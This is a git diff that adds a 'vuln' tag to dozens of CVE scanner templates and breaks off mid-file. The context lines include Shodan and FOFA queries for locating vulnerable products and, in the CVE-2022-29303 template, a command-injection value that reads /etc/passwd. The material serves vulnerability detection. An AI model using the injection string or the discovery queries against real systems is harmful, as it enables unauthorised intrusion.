7924cd0cfab..d5d6ea46d72 100644 --- a/http/cves/2022/CVE-2022-26271.yaml +++ b/http/cves/2022/CVE-2022-26271.yaml @@ -28,7 +28,7 @@ info: product: 74cms shodan-query: http.html:"74cms" fofa-query: app="74cms" - tags: cve,cve2022,74cms,lfr + tags: cve,cve2022,74cms,lfr,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2633.yaml b/http/cves/2022/CVE-2022-2633.yaml index ab6463c9fa7..3fab4e59a3d 100644 --- a/http/cves/2022/CVE-2022-2633.yaml +++ b/http/cves/2022/CVE-2022-2633.yaml @@ -30,7 +30,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360 + tags: cve2022,cve,wp-plugin,unauth,ssrf,wpscan,wordpress,wp,all-in-one-video-gallery,plugins360,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 65340e443e9..9e506ba48a6 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"dotcms" fofa-query: title="dotcms" google-query: intitle:"dotcms" - tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive,vkev + tags: cve,cve2022,packetstorm,rce,dotcms,kev,fileupload,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 4dec8d5b850..83d1d37ec41 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -35,7 +35,7 @@ info: - title="hoteldruid" - icon_hash=-1521640213 google-query: intitle:"hoteldruid" - tags: cve,cve2022,hoteldruid,xss,digitaldruid + tags: cve,cve2022,hoteldruid,xss,digitaldruid,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-26585.yaml b/http/cves/2022/CVE-2022-26585.yaml index 9d163ea7665..3811683c42b 100644 --- a/http/cves/2022/CVE-2022-26585.yaml +++ b/http/cves/2022/CVE-2022-26585.yaml @@ -26,7 +26,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:1464851260 fofa-query: icon_hash="1464851260" - tags: cve,cve2022,mingsoft,mcms,sqli + tags: cve,cve2022,mingsoft,mcms,sqli,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index eda4a55bbf3..e91b0fc0c34 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: openautomationsoftware product: oas_platform - tags: cve2022,cve,oas,oss,unauth,openautomationsoftware,vkev + tags: cve2022,cve,oas,oss,unauth,openautomationsoftware,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index 1b7777389a0..4e93ee791f2 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: std42 product: elfinder - tags: cve2022,cve,lfi,elfinder,std42 + tags: cve2022,cve,lfi,elfinder,std42,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-27043.yaml b/http/cves/2022/CVE-2022-27043.yaml index c5d17b74d52..f6f139a0346 100644 --- a/http/cves/2022/CVE-2022-27043.yaml +++ b/http/cves/2022/CVE-2022-27043.yaml @@ -24,7 +24,7 @@ info: vendor: yearning product: yearning fofa-query: app="Yearning" - tags: cve,cve2022,yearning,lfi + tags: cve,cve2022,yearning,lfi,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index 18b6f654e94..a9dce48a637 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -38,7 +38,7 @@ info: - title="openemr" - app="openemr" google-query: intitle:"openemr" - tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr + tags: cve,cve2022,xss,openemr,authenticated,huntr,open-emr,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index de32c558116..4929dc68d22 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -32,7 +32,7 @@ info: - http.title:"kavita" fofa-query: title="kavita" google-query: intitle:"kavita" - tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader + tags: cve,cve2022,ssrf,kavita,authenticated,huntr,intrusive,kavitareader,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 9042386a86b..c610da249fe 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -40,7 +40,7 @@ info: google-query: - intitle:"qnap" - intitle:"photo station" - tags: cve2022,cve,qnap,lfi,kev,vkev + tags: cve2022,cve,qnap,lfi,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index f2714cbc265..ae4a229ba88 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -30,7 +30,7 @@ info: product: simple_ajax_chat framework: wordpress google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet + tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index da76973dae4..bc1568deef3 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml @@ -36,7 +36,7 @@ info: - app="zimbra-邮件系统" - icon_hash="475145467" - icon_hash="1624375939" - tags: cve,cve2022,zimbra,xss,kev,vkev + tags: cve,cve2022,zimbra,xss,kev,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index 6dc523761e3..f981de1af2c 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: microfinance_management_system_project product: microfinance_management_system - tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project + tags: cve,cve2022,microfinance,edb,sqli,microfinance_management_system_project,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index bbc7b65cc13..311e39c133c 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: time-based-sqli,cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index 5037abc1272..01cae1b9f21 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms + tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms,vuln variables: num: '999999999' diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index 049497b08ec..38e403a5c44 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: thedigitalcraft product: atomcms - tags: time-based-sqli,cve,cve2022,sqli,atom,cms,thedigitalcraft + tags: time-based-sqli,cve,cve2022,sqli,atom,cms,thedigitalcraft,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-28033.yaml b/http/cves/2022/CVE-2022-28033.yaml index 1ce839421ef..829b8a21461 100644 --- a/http/cves/2022/CVE-2022-28033.yaml +++ b/http/cves/2022/CVE-2022-28033.yaml @@ -26,7 +26,7 @@ info: vendor: thedigitalcraft product: atomcms shodan-query: html:"atomcms" - tags: cve,cve2022,atom,cms,sqli + tags: cve,cve2022,atom,cms,sqli,vuln flow: http(1) && http(2) diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 4fc509488ce..ca44571ca58 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: college_management_system_project product: college_management_system - tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project,vkev + tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project,vkev,vuln variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index fd974bdcd71..e9a5ab74222 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: event_management_system_project product: event_management_system - tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project + tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index 688296b2285..c52a6445516 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -29,7 +29,7 @@ info: max-request: 4 vendor: naviwebs product: navigate_cms - tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs + tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index 9d54af7d1c1..ba42905f41d 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml @@ -36,7 +36,7 @@ info: - http.title:"adaudit plus" || http.title:"manageengine - admanager plus" fofa-query: title="adaudit plus" || http.title:"manageengine - admanager plus" google-query: intitle:"adaudit plus" || http.title:"manageengine - admanager plus" - tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp,vkev + tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp,vkev,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index d821dcc8787..57d706cddaf 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -28,7 +28,7 @@ info: vendor: welaunch product: wordpress_country_selector framework: wordpress - tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch + tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index cd354e86550..82f592ce38d 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -35,7 +35,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware,vkev + tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 22527066c2f..68683895135 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -35,7 +35,7 @@ info: - body="reprise license manager" - body="reprise license" google-query: inurl:"/goforms/menu" - tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware,vkev + tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware,vkev,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-28508.yaml b/http/cves/2022/CVE-2022-28508.yaml index 2c9c9d37c55..820bfdb6542 100644 --- a/http/cves/2022/CVE-2022-28508.yaml +++ b/http/cves/2022/CVE-2022-28508.yaml @@ -26,7 +26,7 @@ info: max-request: 1 shodan-query: title:"MantisBT" fofa-query: title="MantisBT" - tags: cve,cve2022,mantisbt,xss,opensearch + tags: cve,cve2022,mantisbt,xss,opensearch,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index a97dc90c3ba..1294c8bf1be 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -27,7 +27,7 @@ info: vendor: wpvivid product: migration\,_backup\,_staging framework: wordpress - tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid + tags: cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 4df72aa3e15..9cae7c910c5 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -32,7 +32,7 @@ info: shodan-query: - 'Server: caddy' - "server: caddy" - tags: cve,cve2022,redirect,caddy,webserver,caddyserver + tags: cve,cve2022,redirect,caddy,webserver,caddyserver,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 2cec398726d..b42febc5aca 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -33,7 +33,7 @@ info: - http.html:"DIR-816L" - http.html:"dir-816l" fofa-query: body="dir-816l" - tags: cve2022,cve,dlink,exposure + tags: cve2022,cve,dlink,exposure,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index a16f07e796b..10513d965a4 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: phpgurukul product: e-diary_management_system - tags: cve2022,cve,xss,authenticated,edms,phpgurukul + tags: cve2022,cve,xss,authenticated,edms,phpgurukul,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index 684b61ed8f1..bbf5361ef7d 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml @@ -29,7 +29,7 @@ info: max-request: 3 vendor: phpgurukul product: online_birth_certificate_system - tags: cve,cve2022,xss,obcs,authenticated,phpgurukul + tags: cve,cve2022,xss,obcs,authenticated,phpgurukul,vuln variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 98a49891c4c..c35ea3597e7 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: phpgurukul product: directory_management_system - tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul + tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index 890ee86091d..ee1b3667c3c 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: phpgurukul product: dairy_farm_shop_management_system - tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul,vkev + tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index aeaba516838..b49bccc2521 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: phpgurukul product: cyber_cafe_management_system - tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul + tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml index dd7fd9114a5..1bbb3e62b3e 100644 --- a/http/cves/2022/CVE-2022-29013.yaml +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -21,7 +21,7 @@ info: max-request: 1 vendor: razer product: sila - tags: packetstorm,cve,cve2022,razer,sila,router,vkev + tags: packetstorm,cve,cve2022,razer,sila,router,vkev,vuln http: - method: POST diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 261eda94a2a..b6bc6a4f67e 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: razer product: sila_firmware - tags: cve,cve2022,edb,packetstorm,razer,lfi,router,vkev + tags: cve,cve2022,edb,packetstorm,razer,lfi,router,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index fd89f092745..a0ffea1c1c1 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -29,7 +29,7 @@ info: vendor: ejs product: ejs framework: node.js - tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js,vkev + tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 74439e412b6..749f5221ccd 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -34,7 +34,7 @@ info: - cpe:"cpe:2.3:a:hashicorp:consul" fofa-query: title="consul by hashicorp" google-query: intitle:"consul by hashicorp" - tags: cve,cve2022,consul,hashicorp,ssrf,intrusive,vkev + tags: cve,cve2022,consul,hashicorp,ssrf,intrusive,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index d9bcb981677..fccff730c10 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -33,7 +33,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2022,redirect,nagios,nagiosxi + tags: cve,cve2022,redirect,nagios,nagiosxi,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index a37eeb8c145..6639f724c77 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -32,7 +32,7 @@ info: - http.html:"SolarView Compact" - http.html:"solarview compact" fofa-query: body="solarview compact" - tags: cve,cve2022,lfi,solarview,edb,contec + tags: cve,cve2022,lfi,solarview,edb,contec,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index d73cac786cf..9493420ff0b 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -26,7 +26,7 @@ info: shodan-query: http.favicon.hash:-244067125 product: solarview_compact_firmware vendor: contec - tags: cve2022,cve,xss,solarview,edb + tags: cve2022,cve,xss,solarview,edb,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29301.yaml b/http/cves/2022/CVE-2022-29301.yaml index d67c3ccf0b3..fdafeb38845 100644 --- a/http/cves/2022/CVE-2022-29301.yaml +++ b/http/cves/2022/CVE-2022-29301.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-244067125 - tags: cve,cve2022,xss,solarview,edb + tags: cve,cve2022,xss,solarview,edb,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index b515b6c56f8..00b8a5f0e7d 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -33,7 +33,7 @@ info: - http.html:"SolarView Compact" - http.html:"solarview compact" fofa-query: body="solarview compact" - tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec,vkev + tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec,vkev,vuln variables: cmd: "cat${IFS}/etc/passwd" diff --git a/http/cves/2022/CVE-2022-29316.yaml b/http/cves/2022/CVE-2022-29316.yaml index 68d0325c178..5a2e04aed11 100644 --- a/http/cves/2022/CVE-2022-29316.yaml +++ b/http/cves/2022/CVE-2022-29316.yaml @@ -19,7 +19,7 @@ info: metadata: verified: true max-request: 1 - tags: cve,cve2022,xss,eris,sqli + tags: cve,cve2022,xss,eris,sqli,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index 645618fd007..8e83c69c6b8 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml @@ -34,7 +34,7 @@ info: fofa-query: - body="kkfileview" - app="kkfileview" - tags: cve,cve2022,kkFileView,xss,keking + tags: cve,cve2022,kkFileView,xss,keking,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 2ae44a4473e..8cc314db84c 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: netgear product: ssl312_firmware - tags: cve2022,cve,sqli,netgear,router,vkev + tags: cve2022,cve,sqli,netgear,router,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index 7b6cc2160bf..a43fe6c8dba 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml @@ -30,7 +30,7 @@ info: vendor: elementor product: website_builder framework: wordpress - tags: cve,cve2022,xss,wordpress,elementor,passive + tags: cve,cve2022,xss,wordpress,elementor,passive,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index ad5cd9514c3..e8bb4d29215 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev,vkev + tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index 6445fdc0cef..da3b948ffbe 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -32,7 +32,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: cve,cve2022,wso2,xss,packetstorm + tags: cve,cve2022,wso2,xss,packetstorm,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index a32f93ab467..cdfae794328 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -33,7 +33,7 @@ info: - http.html:"iSpy is running" - http.html:"ispy is running" fofa-query: body="ispy is running" - tags: cve,cve2022,ispy,auth-bypass,ispyconnect + tags: cve,cve2022,ispy,auth-bypass,ispyconnect,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 12c1b60437b..275e6448b67 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: wbce product: wbce_cms - tags: cve2022,cve,wbcecms,xss,wbce + tags: cve2022,cve,wbcecms,xss,wbce,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 7175243fe44..06b1741232d 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -37,7 +37,7 @@ info: - title="wi-fi app login" - body="wavlink" google-query: intitle:"wi-fi app login" - tags: cve,cve2022,xss,wavlink,router,iot + tags: cve,cve2022,xss,wavlink,router,iot,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index 0e159a407b6..b9037f5477c 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: school_dormitory_management_system_project product: school_dormitory_management_system - tags: cve,cve2022,sqli,school_dormitory_management_system_project + tags: cve,cve2022,sqli,school_dormitory_management_system_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index ebb1d876416..bb9c92ea140 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: school_dormitory_management_system_project product: school_dormitory_management_system - tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project + tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index b4f5ee37c71..6ed044eb0a7 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -29,7 +29,7 @@ info: max-request: 2 vendor: school_dormitory_management_system_project product: school_dormitory_management_system - tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project + tags: cve,cve2022,xss,authenticated,school_dormitory_management_system_project,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-30525.yaml b/http/cves/2022/CVE-2022-30525.yaml index 31e30ad2a83..bec91e0caac 100644 --- a/http/cves/2022/CVE-2022-30525.yaml +++ b/http/cves/2022/CVE-2022-30525.yaml @@ -31,7 +31,7 @@ info: shodan-query: - title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700" - http.title:"usg flex 100","usg flex 100w","usg flex 200","usg flex 500","usg flex 700","usg flex 50","usg flex 50w","atp100","atp200","atp500","atp700" - tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce,vkev + tags: cve2022,cve,packetstorm,zyxel,firewall,unauth,kev,msf,rce,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-3062.yaml b/http/cves/2022/CVE-2022-3062.yaml index 15760cd1073..a0790844725 100644 --- a/http/cves/2022/CVE-2022-3062.yaml +++ b/http/cves/2022/CVE-2022-3062.yaml @@ -28,7 +28,7 @@ info: vendor: simplefilelist product: simple-file-list framework: wordpress - tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist + tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-30776.yaml b/http/cves/2022/CVE-2022-30776.yaml index 5e2bf962900..7727c04a892 100644 --- a/http/cves/2022/CVE-2022-30776.yaml +++ b/http/cves/2022/CVE-2022-30776.yaml @@ -35,7 +35,7 @@ info: fofa-query: - body="powered by atmail" - body="atmail" - tags: cve2022,cve,atmail,xss + tags: cve2022,cve,atmail,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-30777.yaml b/http/cves/2022/CVE-2022-30777.yaml index 0151ff50195..6073bf155cb 100644 --- a/http/cves/2022/CVE-2022-30777.yaml +++ b/http/cves/2022/CVE-2022-30777.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"h-sphere" - intitle:"parallels h-sphere" - tags: cve,cve2022,parallels,hsphere,xss + tags: cve,cve2022,parallels,hsphere,xss,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-31126.yaml b/http/cves/2022/CVE-2022-31126.yaml index dfac53747cb..5584bcf1e73 100644 --- a/http/cves/2022/CVE-2022-31126.yaml +++ b/http/cves/2022/CVE-2022-31126.yaml @@ -29,7 +29,7 @@ info: product: roxy-wi shodan-query: html:"Roxy-WI" fofa-query: body="roxy-wi" - tags: cve2022,cve,rce,roxy,roxy-wi,vkev + tags: cve2022,cve,rce,roxy,roxy-wi,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-31137.yaml b/http/cves/2022/CVE-2022-31137.yaml index 